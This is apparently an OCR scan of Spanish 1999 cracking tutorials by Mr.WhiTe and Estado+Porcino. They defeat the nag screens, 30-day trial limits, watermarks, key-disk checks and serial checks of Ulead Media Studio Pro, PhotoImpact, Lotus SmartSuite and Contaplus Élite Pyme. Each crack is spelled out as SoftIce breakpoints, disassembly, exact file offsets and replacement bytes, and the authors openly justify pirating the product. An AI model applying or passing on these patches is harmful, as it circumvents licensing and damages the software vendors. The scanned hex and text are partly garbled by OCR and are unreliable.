tener en cuenta si el programa realiza alguna modificación en la pila. Un par de ejemplos sencillos para entender "el 
concepto": 


Programa: Lotus SmartSuite Millenium Edition (Protección analizada por Mr.WhiTe) véase http://ecd.tsx.org. 

En este caso la ventana se presenta en pantalla haciendo uso de la función dialogboxparama. 

Nos aparecen varios botones. El que nos interesa pulsar es el botón de "Ok". ¿Soluciones? 

La mejor opción dadas las circunstancias será provocar que el programa pulse por si mismo el botón. 

¿Como conseguimos esto? 

Si pulsamos el boton "OK" nos devolvera el valor 10, así que en el momento de pasarle los parámetros a la función 
dialogboxparama, forzamos el programa a introducir el valor 10 en EAX. Para más información consulta la Win32 
Programmer's Reference 


Programa: Ulead Photolmpact v4.12 (Protección analizada por Mr.WhiTe) véase http://ecd.tsx.org. 


En este caso podemos saltarnos la molesta ventana simplemente evitando que el programa llame a la función 
DialogBoxParamA. Para ello sustituimos la llamada por unos cuantos bytes inofensivos: 


:4EB066CD FF15F4A3B14E Call dword ptr [4EB1A3F4] <--- Llamada a DialogBoxParamA 


: 4EB066CD 909090909090 NOP NOP NOP NOP NOP NOP <---— Código inofensivo 


Ojo: Esta opción no siempre es posible. En este caso sabemos que no sucedera ningún imprevisto porque el programa 
no realiza ninguna modificación en los valores almacenados en la Pila. 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site 


L) 


Programa Ulead Media Studio Pro v5.01 | W9S5 / W98 / NT 


Se trata de una interesante suite de creación multimedia: 


Descripción : A ] 
P audio, dibujo, video... 


Tipo Trial de 30 dias 


Url http://www .ulead.com 


Protección Nag Screen. Time Limit 30 Dias 


Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 


Herramientas Softlce v3.25, Referencia API32 
Objetivo Conseguir que no caduque el programa y Eliminar una horrible X 
Cracker Estado+Porcino 


Fecha Septiembre de 1999 


VW 


INTRODUCCION Y AGRADECIMIENTOS DE Mr.WhiTe [WkT!] 


Hace ya algún tiempo cayó en mis manos este interesantisimo programa de Ulead, al cual obviamente 
no me pude resistir. Resultó un adversario bastante digno, quizá demasiado para mi estilo de cracking. 
Poco tiempo libre y alguna que otra neurona ausente por vacaciones. Así que tras docenas (no 
exagero, lo juro) de e-mails pidiendo como llorones que publicase un fix de mi crack evitando las 
dichosas X, me vi obligado a endosarle el muerto a otro. ¿Para qué estan los amigos? :0) 


Por lo tanto agradecimiento DOBLE para: 
Estado+Porcino y tambien para Mr.PinK [WkT!] que ha colaborado en este artículo. 
Que lo disfruteis. 


VI 


CAPITULO VII. Desclavando cruces con Jose de Arimatea. 


VIH 


DISCULPAS Y FELICITACIONES 


Whiskey Kon Tekita 


Saludos Familia. 
Cuanto tiempo, otra vez. 


EL escaso tiempo y la falta de protecciones realmente interesantes que caen en mis manazas 
ralentizan los nuevos capítulos. 


Primero mis felicitaciones al nuevo y excelente panorama crack español. Grupos como [WkT!], webs 
tan interesantes como las de ECD (Estudio Colectivo de Proteccciones) y foros de comunicación 
(http://disc.server.com/discussion.cgi?%id=23018) ponen en contacto a los excelentes crackers que 
existen en España. 

Felicitaciones a la Gorda por aguantarme tanto tiempo sin tararse :-) 


Os 
Vi 


UN PRIMER VISTAZO 


Echemos un vistazo a nuestro "niño" 
La proteccion tiene 2 niveles claramente identificados: 


1.- Proteccion Cinderella de 30 días. 
2.- Unas X rojas censoras en el editor de dibujo y en el editor de video. 


Ademas existen 2 nags de entrada que nos recuerdan lo mísero de la existencia no registrada. 


a 
VA 


X CENSORAS EN EL EDITOR DE DIBUJO 


Bien, saltemos las nags por ahora y abramos el editor de dibujo vpaint. 


Pinchemos en File/New/OK y tendremos un bonito lienzo pa dibujar. Un par de brochazos cutres y pulsemos intro para ver la animación. 
Sale una horrenda y roja X censora que tapa nuestros estúpidos brochazos. Empezemos a pensar un poco.Como se podra dibujar una X 
en pantalla. Pos, inicialmente no se me ocurre nada. Bueno sí color crack, pero si lo utilizamos aparecemos en un nido de llamadas del 
API de Video, asi que lo dejamos. Veamos que herramientas utiliza aplicando la lista muerta. Lo primero que encontramos en la lista de 
funciones importadas es: 


Import Module 001: MSVFW32.dll 


Addr:00086998 hint(0002) Name: DrawDibClose 

Addr:000869A8 hint(0003) Name: DrawDibDraw 

Addr:000869B6 hint(0007) Name: DrawDibOpen 

Esto se parece mucho a MocoSoft Video For Window 32 bits. Recordemos que estamos montando una animación, así que es lógico que 
usemos esta librería. Conozcamos algo acerca del formato DIB gentileza de la ayuda de M$ VC++ 


DrawDib Functions An application uses DrawDib functions to create and manage a DrawDib DC, display and update images on-screen, 
manipulate palettes, and to close the DrawDib DC when it's no longer needed. The DrawDib functions also include a timing function 
and a test function to determine display characteristics. 


Veamos un poco mas acerca de la funcion drawdib que es la que tiene mas pinta de ayudarnos: 


The DrawDibDraw function draws a DIB to the screen. 


BOOL DrawDibDraw( HDRAWDIB hdd, HDC hdc, int xDst, int yDst, int dxDst, int dyDst, LPBITMAPINFOHEADER 1lpbi, 
LPVOID lpBits, int xSrc, int ySrc, int dxSrc, int dySrc, UINT wFlags ); 


Asi pues con esto pinta en pantalla, pero ¿qué tenemos que buscar? 


Lancemos nuestro querido Sice cargando previamente el Load Expoorts la libreria MSVFW32.d1l Abramos el vpaint y antes de darle al 


intro pongamos un "bpx drawdibdraw". Y boom, aparecemos en MSVFW32!drawdibdraw con f12 regresamos al vpaint. A esta hora ya 
ha aparecido la jodida X censora pintada por drawdibdraw, como suponiamos. Aparecemos en: 


* Reference To: MSVFW32.DrawDibDraw, Ord:0003h 


:0046512E E879760000 Call 0046C7AC // Aqui se pinta la X censora */ 
:00465133 56 push esi 


* Reference To: MSVFW32.DrawDibClose, Ord:0002h 


:00465134 E86D760000 Call 0046C7A6  // Cerramos el dib 
:00465139 C745FCFFEFFEFFEF mov [ebp-04], FFEFFFEFEFF 

:00465140 E874000000 call 004651B9 

:00465145 B801000000 mov eax, 00000001 

:0046514A EB77 jmp 00465103 


Bien, ya sabemos donde se pinta la X, ahora existen 2 opciones: 


e Que la X se introduzca de forma incondicional ya que estamos en una version Trial del programa. 
e Que se introduzca de forma condicional 


La opción B es la más sencilla de rastrear, así que adelante con ella: 


Si rastreamos quien llama a estas sentencias observamos : 


:00465A84 ES5TETFFFF call 004651E0 // Si eax==0 no pintamos la X censora. 
:00465A89 85C0 test eax, eax 

:00465A8B 741A je 00465AA7 //Salto Condicional 

:00465A8D 8B442410 mov eax, dword ptr [esp+10] 

:00465A91 8B4E04 mov ecx, dword ptr [esi+04] 

:00465A94 50 push eax 

:00465A95 E8C6F5FFEF call 00465060 //Pinta la X 


Rastreando :004651E0 vemos: 


:004651E0 56 push esi 

:004651E1 57 push edi 

:004651E2 8BF9 mov edi, ecx 

:004651E4 85FF test edi, edi 

:004651E6 7427 je 0046520F 

:004651E8 837F2000 cmp dword ptr [edi+20], 00000000 //Flag de control de X 
:004651EC 7421 je 0046520F //Saltamos si no hay que pintar la X 
:004651EE 8B742410 mov esi, dword ptr [esp+10] 

:004651F2 56 push esi 

:004651F3 E848FDFFEF call 00464F40 

:004651F8 8B476C mov eax, dword ptr [edi+6C] 

:004651FB 8B4C240C mov ecx, dword ptr [esp+0C] 

:004651FF' 50 push eax 

:00465200 56 push esi 

:00465201 51 push ecx 

:00465202 8B4F78 mov ecx, dword ptr [edi+78] 

:00465205 E8E6020000 call 004654F0 

:0046520A 5F pop edi 

:0046520B 5E pop esi 

:0046520C C20800 ret 0008 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :004651E6(C), :004651EC (C) 


:0046520F 33C0 xor eax, eax //Flag activado para evitar las X 
:00465211 5F pop edi 

:00465212 5E pop esi 

:00465213 C20800 ret 0008 

Si cambiamos :004651E6 7427 je 0046520F 

por :004651E6 EB27 jmp 0046520F 


No aparece la X pero tampoco nuestros garabatos, asi que 
sigamos subiendo para ver que encontramos: 


:004392A3 E888F10100 call 00458430 //Asigna el flag. 

:004392A8 85C0 test eax, eax 

:004392AA 740C je 004392B8 //Saltamos el 32c1pbd.dib_MarkVideo???7?7 
:004392AC 8B07 mov eax, dword ptr [edi] 

:004392AE 50 push eax 


* Reference To: u32clpbd.dib_MarkVideo, Ord:0001h 


:004392AF FF15DC684800 Call dword ptr [004868DC] 11/2227? 
:004392B5 83C404 add esp, 00000004 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :004392AA(C) 

| 

:004392B8 8B75EC mov esi, dword ptr [ebp-14] 
:004392BB 8B07 mov eax, dword ptr [edi] 
:004392BD 83C608 add esi, 00000008 

:004392C0 50 push eax 

:004392C1 8B5508 mov edx, dword ptr [ebp+08] 
:004392C4 8BOE mov ecx, dword ptr [esi] 
:004392C6 51 push ecx 

:004392C7 52 push edx 

:004392C8 B908344800 mov ecx, 00483408 

:004392CD E89EC70200 call 00465A70 //Lamada para pintar la DIB 


Esto se parece mucho a lo que buscabamos, un salto condicional 
sobre una función que trabaja con DIB y con video. 


Miremos por 00458430 


:00458430 8B81CC010000 mov eax, dword ptr [ecx+000001CC] //Flag de control de X 
:00458436 85C0 test eax, eax 

:00458438 7403 jmp 0045843d 

:0045843A 33C0 xor eax, eax //Buen chico sin cruces en las espaldas 
:0045843C C3 ret 

:0045843D 8B8064010000 mov eax, dword ptr [eax+00000164] 

:00458443 2D15050000 sub eax, 00000515 

:00458448 83F801 cmp eax, 00000001 

:0045844B 1BCO sbb eax, eax //Asigna flag para pintar la X 
:0045844D F7D8 neg eax 

:0045844F C3 ret 


Si cambiamos 


:00458438 7403 jmp 0045843d 
Por :00458438 33C0 xor eax.eax (Offset 0x57838 en Vpaint.exe) 


Solucionado el tema, probémoslo y funciona a las mil maravillas. 


X CENSORAS EN EL EDITOR DE VIDEO 
Conociendo el precio del pescao, miremos si existe u32clpbd.dib_MarkVideo dentro de las funciones importadas por el veditor.exe. No 
hay suerte, así que pintan la X de forma diferente, pensemos, por que aquí es donde reside la diversión. 


¿Cómo narices pinta la X? 


Recordemos la función que se utiliza para pintar en pantalla MSVFW32.DrawDibDraw. 

Abramos el editor e insertemos un AVI al final de la secuencia poniendo un bpx drawdibdraw. 

La funcion se activa 2 veces antes de dibujar la jodida X en :00488C0E. Si subimos y buscamos saltos condicionales, no encontramos 
nada aprovechable, así que un poco de ZEN. 


La función DrawDibDraw usa un bitmap que es el que pinta en pantalla. este bitmap lo encontrmos como 7” parámetro de la función: 
LPVOID IpBits, 
TRAMPA PARA OSOS 


Insertemos un trozo de video al final de la secuencia para dejar varios segundos en blanco sólo para la X censora. 


En :00488C00 55 push ebp “//Encontramos el puntero a los bytes del bitmap. 


Si ponemos un bpx 00488C00 y guarreamos el las bytes del bitmap vemos 

que guarremos la X que dibujamos, así que estamos en el buen camino. 

Como la secuencia de video está al final, sólo hay secuencias en blanco con la X antes del verdadero video. 
El aspecto del bitmap es todo FF FF FF FF excepto cuando hay que pintar la X que cambia a 00 00 00 

La trampa esta servida pogamos un bpm XXXX W en algunos de los ceros y vemos quien escribe 


:0048B2DC C6430100 mov [ebx+01], 00 


Estamos en plena rutina de creación de la X censora. 
Esta rutina empieza en :0048B 18D y es llamada condicionalmete por 


:0048B17B 837E1000 cmp dword ptr [esi+10], 00000000 //Test flag. 
:0048B17F 740C je 0048B18D //Salta y pinta la X 


Si ponemos un bpx en 0048B17B y seguimos indagando, vemos que el flag es realmente [590ff0] 


Poniendo un bpm 590ff0 w aparecemos en: 


:00527130 A1E8235700 mov eax, dword ptr [005723E8] 

:00527135 8B8064010000 mov eax, dword ptr [eax+00000164] 

:0052713B 3D14050000 cmp eax, 00000514 //Si el flag maestro es 514 entra de forma normal 
:00527140 752B jne 0052716D 

:00527142 8B44240C mov eax, dword ptr [esp+0C] 

:00527146 8B4C2408 mov ecx, dword ptr [esp+08] 

:0052714A 8B542404 mov edx, dword ptr [esp+04] 


* Possible Reference to String Resource ID=00001: "VE" 


:0052714E C70001000000 mov dword ptr [eax], 00000001 
:00527154 8B442410 mov eax, dword ptr [esp+10] 


* Possible Reference to String Resource ID=00001: "VE" 


:00527158 C70101000000 mov dword ptr [ecx], 00000001 


* Possible Reference to String Resource ID=00001: "VE" 


:0052715E C70201000000 mov dword ptr [edx], 00000001 
:00527164 C70000000000 mov dword ptr [eax], 00000000 
:0052716A C21000 ret 0010 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00527140(C) 

:0052716D 3D15050000 cmp eax, 00000515 //Flag maestro para entrar en forma trial. 
:00527172 752B jne 0052719F 

:00527174 8B44240C mov eax, dword ptr [esp+0C] 

:00527178 8B4C2408 mov ecx, dword ptr [esp+08] 

:0052717C 8B542404 mov edx, dword ptr [esp+04] 

* Possible Reference to String Resource ID=00001: "VE" 

:00527180 C70001000000 mov dword ptr [eax], 00000001 

:00527186 8B442410 mov eax, dword ptr [esp+10] 

* Possible Reference to String Resource ID=00001: "VE" 

:0052718A C70101000000 mov dword ptr [ecx], 0000000 

* Possible Reference to String Resource ID=00001: "VE" 

:00527190 C70201000000 mov dword ptr [edx], 0000000 

* Possible Reference to String Resource ID=00001: "VE" 

:00527196 C70001000000 mov dword ptr [eax], 0000000 //Actualiza el flag [590£f0] 
:0052719C €21000 ret 0010 


Asi pues, existe un flag maestro, si es 0x514 entramos de forma normal y registrada, 
y 0x515 de forma trial. El cambio es claro 


:00527140 752B jne 0052716D por :00527140 EBOO jmp 00527142 
(0x126540 offset en veditor.exe) 


Listo, una cruz menos en nuestra conciencia. 


NAGS Y OTRAS ESTUPIDECES 


El trabajo duro está hecho, no queda mas que eliminar un par de nags. 
La pista esta en nombres luminosos como u32cfg:ulcCheckLegality 
Basta cambiar en el ofsset 0x404 del fichero u32cfg: 6A 00 por EB 13 


Bueno, eso es todo, pero recuerda. 

Busca la fuente, busca a +ORC en la Red 
Hasta la próxima. 

estadoporcinoO hotmail.com 
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COMO CRACKEAR POR ESTADO+PORCINO| 


CAPÍTULO VI. DESVIRGANDO EXPEDIENTES X 
-Como Crackear Contaplus Élite Pyme- 


Junio 1999 


Indice 
INTRODUCCIÓN 


AL ATAQUEEEEEEE 


PROTECCIONES ESPAÑOLAS 


PRIMERA APROXIMACION Y PRIMER ENFADO 


OBJETIVOS 
SEGUNDA APROXIMACIÓN Y SEGUNDA OSTIA. LAS COSAS SE COMPLICAN 


LA SOLUCIÓN A LA PELUA CUESTIÓN 


MODIFICACIÓN DE FICHEROS CREADOS EN TIEMPO DE EJECUCIÓN 


INTENTO SER UN TIO ELEGANTE, PERO NO ESTÚPIDO 


CAER EN LA CUENTA 


OPCION 3 CAÑERA 


VUELTA A LA PROTECCIÓN 


ESTÚPIDO VELO 


¿ÉXITO? 


SOLUCIONES VIABLES 


HORROR Y ESPANTO 


EL MISTERIO INSONDABLE 


EL EXPEDIENTE X DESVIRGADO 


JUGUETEANDO 


PD PARA EL PROGRAMADOR 


INTRODUCCIÓN 


Victima: CONTAPLUS ÉLITE PYME 
Site: www.gruposp.com 
HERRAMIENTAS: 


Desensamblador. Por ejemplo w32dasm 
Editor hexadecimal. Por ejemplo uedit 
Paciencia y Confianza. 


Saludos familia. Aprovecho los ratos para escribir algunas cosillas. 

En esta ocasión acometemos uns joyita con Discos llave, Números de serie,encriptación, 
descompresión en tiempo de ejecución y misterios insondables. 

Un dulce para pasar el rato. 


Llegó a mis manos una petición de crack. Normalmente la desestimo, a menos que la pida un 
amigo, me interese o favorezca mi entorno de trabajo. 

Es mejor enseñar a crakear que enseñar a llorar para suplicar. 

En fin, toda esa filosofía expuesta por +ORC y reescrita por E+P. Son las 8:00 de la mañana 
y me he pasado toda la noche crakeando. 

Si señor, hay pocos placeres comparables. 

Los crackers me entenderán perfectamente de lo que les hablo:-). 

El peluo maulla desesperao y la gorda duerme a mi lado. 

A veces la vida te sonríe y no sabes porqué.Aprovéchala antes de que cambie. 


En este entorno , nada se puede resistir... 


AL ATAQUEEEEEEE 


Miremos nuestro producto. Se trata de un clásico de la facturación española. Contaplus 
Pyme Elite Otoño 98 del 1-11-98 
Un paquete en formato CD que se compone de: 


ContaPlus 

FacturaPlus 

NominaPlus 

PersonalPlus 

Utilidades (Antivirus Norton, Antivirus Mcafee, Sidekick y PC Anywhere) 


La web la tenemos en Www.gruposp.com. 
Despendolemos un ratico por su web a ver a cuanto tienen el timo. 


Uhmm 2 millones de ventas y nuestro producto 165.000 pelas, !!! 
Precio especial !!!! 

Joer, pos si que, pa una urgencia, vamos. 

Se merecen que lo crackeen, si señor. 


PROTECCIONES ESPAÑOLAS 


A primera vista, el programa es español y por tanto la protección también. Conociendo los 
antecedentes de protecciones españolas, estimo que estará roto en 5 minutos. Sólo recuerdo 
una protección española cojonuda. Era de un catalán y se la había puesto a su programa de 
rompecabezas. Si sería buena que fue uno de los "coladores''para la +HCU con +ORC y 
+Fravia(a ver si se recupera pronto, leñe) 


PRIMERA APROXIMACION Y PRIMER ENFADO 


Empezamos mal, intentamos instalar el contaplus y nos pide un disquete llave. Joder, ¿no 
habían pasado al olvido esas protecciones basadas en discos llave?. ¿Es que no aprenden?. 
Los discos llave fueron desechados porque 

no eran fiables, se podían cascar en el trayecto de la fábrica al usuario y luego vete a reclamar 
al maestro armero una vez que has pagado el producto, eso sin contar 

el tiempo de espera del nuevo disquete, y que el que te manden no esté roto. 

Para colmo, estos discos se formatean a medida por lo que no se pueden 

copiar (en general) ni siquiera para sacar una triste copia de seguridad. 

Como veis, una mierda, y los del CONTAPUS dale que dale. 


OBJETIVOS 


Estan claros, cepillarse al CONTAPLUS y obviar el disco llave. 
Pero conseguiremos bastantes cositas más. 


SEGUNDA APROXIMACIÓN Y SEGUNDA OSTIA. LAS COSAS SE COMPLICAN 


Si intentamos instalar sin disco llave nos aparece una estúpida ventana: 
"Inserte disco llave, Por favor retire el disco actual y bla,bla,bla'' 

La ventanita tiene pinta de dialogbox, así que nos vamos al SoftIce y ponemos 
unas bonitas trampas para osos. 


bpx dialogbox 
bpx dialogboxparama 


Lanzamos al niño y el que pica es el bpx dialogboxparama. 

Con f12 aparece la ventana de error, pulsamos NO y caemos en kernel!alloc. 
Ostias que feo. F12 antes pa asomar el pescuezo en 

:10012739 dentro del proceso -GLC000x. (la x es variable). 


Ostias, que mierda es esta, ¿dónde está es fichero ese tan raro?. 

En el directorio del conta no, seguro. 

¿Pero entonces dónde?. Si buscamos el ficherito no está en el disco duro. 

Entonces, ¡por la madre de MITRA!, ¿que coño pasa?. 

Pensad una posible solución antes de pasar al siguiente párrafo, que os van a salir almorranas 
cerebrales. 


LA SOLUCIÓN A LA PELUA CUESTIÓN 


Pos si, seguro que ya lo habeis acertado :-) 

El puto fichero se crea en tiempo de ejecución y se borra antes salir. 

Por eso no aparece en el directorio de instalación ni en el disco duro al finalizar. 

Pero entonces, segunda e importante cuestión: 

¿como mangonearemos si se genera en tiempo de ejecución? 

Es vital poder toquetear para saltarse la protección. 

Así pues, relegamos el estudio del 

para centrarnos en como se puede modificar un fichero que se crea en tiempo de ejecución. 


MODIFICACIÓN DE FICHEROS CREADOS EN TIEMPO DE EJECUCIÓN 


Las variantes que se me ocuren de menos a más elegantes son: 


1 Entender como se crea el fichero y retocarlo antes de que se cree. 

2 Parchearlo en memoria una vez creado 

- mediante un parche en tiempo de ejecución. 

- Aplicando ingeniería inversa para localizar y redirigir un trozo de código 

inútil dentro del ejecutable y que parchee el fichero. 

3 Dejar que se cree en memoria pero redirigirlo a un fichero en disco ya retocado. 


Recuerdo cierta protección del mismo tipo en el Hotmetal 4.0. antes que los encerraran en la 
inutilidad del vbox. 


INTENTO SER UN TIO ELEGANTE, PERO NO ESTÚPIDO 


Pues eso, intento ser un tio elegante y opto por la primera opción y descubro lo siguiente: 


* Dentro del fichero instalar.exe del contaplus reside el famoso -GLCO000x. 

En tiempo de ejecución se lee un trozo del fichero instalar.exe, se marea un poco y se 
construye el nuevo fichero. 

El nombre se construye a partir de una cadena constante :-GLC %04x.tmp. 

Podeis abrir el fichero instalar.exe y cambiar el nombre por algo más decente. 

Tengo destripado y pasado a C el algoritmo que extrae del fichero instalar.exe los bytes, los 
marea un poco y los escribe en el -GLC%04x.tmp. 

Si quereis más datos del algoritmo mandadme un mail. 


* Me quedaba la duda de si el autor de la protección había encriptado, comprimido o 
encriptado/comprimido. 

La respuesta es sólo comprimido siguiendo un complicado algoritmo que tengo casi analizado. 
Asi pues sólo queda otra semana para crear un compresor (el descompresor ya lo tengo, está 
en el propio programa). 


* Como la cosa se complicaba, deseche esta vía y me fui a la opción 2. 
Pronto la desistimé porque no sabía cuantos parches tenía que aplicar. 


Así pués, me fui a la vía 3. Ya sé, ya sé, es la más cutre, pero rula :-) 


CAER EN LA CUENTA 


Concurrida audiencia, por si no os habeis dado cuenta, la protección es muy buena. 
RESPETAD AL PROGRAMADOR que se ha entretenido en comprimir sus datos 
y descomprimirlos en tiempo de ejecución. 

Buen trabajo BBYYMMAARRCCOOSS. 

Quizás no esté todo perdido dentro del panorama de programadores españoles. 
Aupa muchachos!!! 


OPCION 3 CAÑERA 


Lo primero es pillar una copia chachi del “GLC% 04x.tmp pa poder 

modificarla tranquilamente y después regirigir el programa para que cargue nuestra dll y no la que ha creado. 
Para ello, lanzamos el instalar y aparece la venta de error con "si" y "no". 

Nos vamos al explorador de Windows con la teclilla nueva con el logo del windoze 

(ostias, pero si sirve pa algo y to), o bien lo abrimos antes que el instalar y conmutamos con ALT+TAB. 
Estamos seguros que el fichero debe de existir porque aún no ha acabado el programa (nos da la opción de continuar 
si pusamos "'si''), 

Buscamos en el explorador los ficheros que empiezen por -GLC y bingo, 

lo tenemos en ciwindows. Con mucho cuidado lo copiamos y lo pegamos en un sitio seguro. 

Nuestra cena ya está en la red :-=). 

Para los descuidados como yo, habilitarle la opción de sólo lectura con el botón derecho 

del ratón y propiedades. Sino lo perderemos cuando lo utilizemos. 

Recordad quitarle lo de sólo lectura para parchearlo. 


Do quiera que un fichero se cargue en memoria y se ejecute en tiempo de ejecución este debe ser una dll. 

Ya sé, ya sé, no tiene extendión dll ni ná, pero no es necesario. 

Para que un fichero sea considerado dll basta con tener nombre y extensión, y la constante -GLC %04x.tmp lo 
cumple. 

Por tanto, instalar debe cargarlo como librería. Si lo desensamblamos, vemos que usa la función del api 
KERNEL32.LoadLibraryA y además sólo una vez. 


:004024F7 740A je 00402503 
:004024F9 E87E060000 call 00402B7C 
:004024FE E9BDO00000 jmp 004025C0 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004024F7 (C) 


:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES] 
:00402509 50 push eax; Nombre churro de la librería -GLC%04x.tmp 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


Ahora hay que aplicar un poco de ingeniería inversa para transformar y que cargue siempre nuestra librería retocada. Os ahorro el 
proceso mental y obtenemos después de verificar que nunca se pasa por 
:004024F9 (con un bpx por ejemplo) 


:004024F7 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEE8];Dirección del nombre de la dll a cargar 


:004024FD C700432E6100 mov dword ptr [eax], 00612E43 ¿Constante .a0 y aprovechamos la c inicial 
de [eax] nos queda c.a 

:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES];Guardamos las modificaciones. 

:00402509 50 push eax 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


Con esto siempre se carga la librería 'c.a''. Así pues renombramos la -GLC %04x.tmp que habiamos pescado antes como ''c.a" . Ya sé, el 
nombre es un poco cutre, pero si no os gusta retocarlo vosotros. No se os olvide indicar que es de sólo lectura si no lo queréis perder. 


Si repetimos lo del bpx dialogboxparama aparecemos en el proceso C!text (nuestro fichero c.a). Vamos por el buen camino. To este rollo 
pa redirigir un puto fichero, la protección debe ser la ostia. Estoy ansioso :-) 


Resumiendo, buscamos en el instalar.exe 74 0A ES 7E 06 00 00 y lo encontramos en 0x18F7 y cambiamos por 8D 85 ES FE FF FF C7 00 
43 2E 61 00 


VUELTA A LA PROTECCIÓN 


Ya podemos mangonear tranquilos nuestro C.a. 

Ahora hay que localizar donde se llama al disco llave y neutralizarlo. 

Los accesos al disco se pueden hacer de forma cutre y a alto nivel con 'deviceiocontrol'' 

o bien usando las interrupciones a pelo. Como podeis sospechar, se han usado los deviceiocontrol. 
Si en el softlce ponemos un bpx deviceiocontrol aparecemos en una dll mu fea GLfxxxx.tmp. 
Esto suena al mismo truquillo de descompresión en tipo de ejecución. 

Si pusamos unas 20 veces f12 reaparecemos en nuestra querida c.a 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C call [ebp+0C] ¡Llamada a la feisima glfxxxx.tmp 
:1001524E E93C010000 jmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C call [ebp+0C] ¡2% Llamada 


Os ahorro el trabajo y os comento como funciona el esquema de protección a este nivel. 
Se crean 2 dll en tiempo de ejecución en el mismo estilo que ya hemos comentado. 
Estas dll se encargan de todo el acceso al disco llave. 

Los parámetros a las dll se pasan (agarraos) en cadenas ascii. 

Basta con poner un bpx 1001524B y echar un vistazo a esi y edi. 

Obtendremos parámetros del tipo 

3HayDisco 

3Esdisco 

3Instalaciones 


ESTÚPIDO VELO 


Corramos un estúpido velo en esta parte de la protección, porque es la más patética. 
Baste decir dos cosas, para anular completamente al disco hay que parchear :1001524B. 
En :1001524B se comprueba que existe disco, que el disco tiene el formato adecuado, 

se leen el número de licencias . 

Si existe algún error devuelven en eax=0, sino devuelven eax=1 

Así pues cambiamos 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C Call [ebp+0C] 

:1001524E E93C010000 jmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C call [ebp+0C] ¡2% Llamada 
Por 

:1001524B 33 CO xor eax,eax 

:1001524D 40 inc eax 

:1001524E E93C010000 jmp 1001538F 

:10015253 33 CO xor eax,eax 

:10015255 33 CO xor eax,eax 

:10015257 40 inc eax 

:10015257 90 nop 


Buscamos FF 24 85 8EÉ 54 01 10 en c.a y lo encontramos 

en 0x1464B donde ponemos 33 CO 40 E9 3C 01 00 00 33 CO 33 CO 40 90 

Con esto quedan fulminados los accesos a disco. 

Si seguimos adelante nos pide un número de serie que se puede obviar si parcheamos en 


:1001525E FF75B8 push [ebp-48] 
:10015261 FF75B4 push [ebp-4C] 
:10015264 FF550C call [ebp+0C]; eax=0 si todo va bien. 


:10015267 E923010000 jmp 1001538F 


por 


:1001525E 33C0 xor eax, eax 
:10015260 33C0 xor eax, eax 
:10015262 33C0 xor eax, eax 
:10015264 33C0 xor eax, eax 
:10015266 90 nop 

:10015267 E923010000 jmp 1001538F 


Si no parcheamos los push el programa casca. 

Resumiendo, buscamos en c.a ff 75 b8 ff 75 b4 ff 55 0C E9 23 01 00 00 

y lo encontramos en 0x1465E, cambiándolo por 33 c0 33 c0 33 c0 33 c0 90 

Cuando pida el serial podemos introducir cualquier churro numérico p.e: 111-1-696969-11 
En el nombre de la empresa y nombre del usuario introducimos más de dos caracteres. 


Curiosamente todas estas rutinas GLC de acceso a disco y check del serial, aparecen como 
una dll normal spptr.dil en el directorio de instalación. Para qué, mu sencillo, 

para deinstalar y eliminar una licencia del disco llave. 

En teoría hay un número límite de instalaciones, cada vez que se instala 

el programa se elimina una licencia del disco llave y cada vez que se desistala se añade una. 


¿ÉXITO? 

Si seguimos todos los pasos, la instalación finaliza correctamente . 

Ávidos lanzamos el programa y crash.''Aplicación instalada incorrectamente". 
¿En qué nos hemos equivocado?. Pensad un poco. 


SOLUCIONES VIABLES 


Seguro que habéis llegado a la misma conclusión que yo. 

Las rutinas de manejo de disco que hemos inutilizado, dejaban algun flag en algún sitio 
que indicara que el programa estaba bien instalado. 

Así pues hay quedan dos opciones: 


1 Saltar la comprobación en el programa principal. 
2 Activar ese flag. 


HORROR Y ESPANTO 


Seleccionando la opción 1 nos encontramos en un avispero. 

El progrma principal está hecho en CLIPPER. 

Qué horror, aún se siguen usando esas herramientas del demonio. 

Si queréis pasarlo realmente mál intendad, trazar un programa en clipper. 

El control se realiza por bucles 

de salto del tipo call[ax+4] que conducen a otros bucles de salto call [ebx+6], hasta el inifito. 
Todo está dirigido por tabla y en código de 16bits. 

Osea nada de usar la potencia de los registros de 32 bits. 

Una montaña de mierda, como podreis observar. 

Nada recomendabe ni saludable. 

Optamos por la opción 2. Para eso llamamos a nuestro amigo y le pedimos que nos comprima 
el CONTAPLUS (bien instalado) en 

disquetes para compararlo con el que tenemos. Busque las diferencias. 


EL MISTERIO INSONDABLE 


Si descomprimimos el CONTAPLUS bien instalado en nuestro disco duro nos llevamos 
una desagradable sorpresa. ''Aplicación mal instalada". 

Joder, que coño pasa, pero si lo hemos copiado de uno que estaba bien instalado. 

A ver, a lo mejor accede al registro del sistema buscando algo raro. 

Lanzamos el regmon y vemos que la aplicación accede pero busca cosas nada importantes. 
Podréis pensar, bueno quizás busque un fichero extraño que no hayamos copiado. 
Lanzamos en filemon y sólo accede al win.ini fuera de su directorio. 

Miramos el win.ini y no vemos nada sospechoso. 


¿To esto está mu bien, pero que coño mira para saber que no está bien instalado? 


Este es el misterio insondable que me ha tenido la noche en velo y que me ha hecho disfrutar 
como un enano cabezón. Pero hay más, si copiamos el directorio de instalación en el disco duro 
donde se instaló originalmnte, el programa deja de funcionar. 

Quedan eliminados los flags en el registro del sistema y el acceso a ficheros raros, 

como ya suponíamos. Y el colmo, si copiamos y pegamos el ejecutable en el directorio de 
instalación del disco duro original de instalación el jodio programa funciona con el 

ejecutable original, pero no con la copia. ¿es mágia? 

¿hay una explicación razonable o estamos ante un expediente X ? 


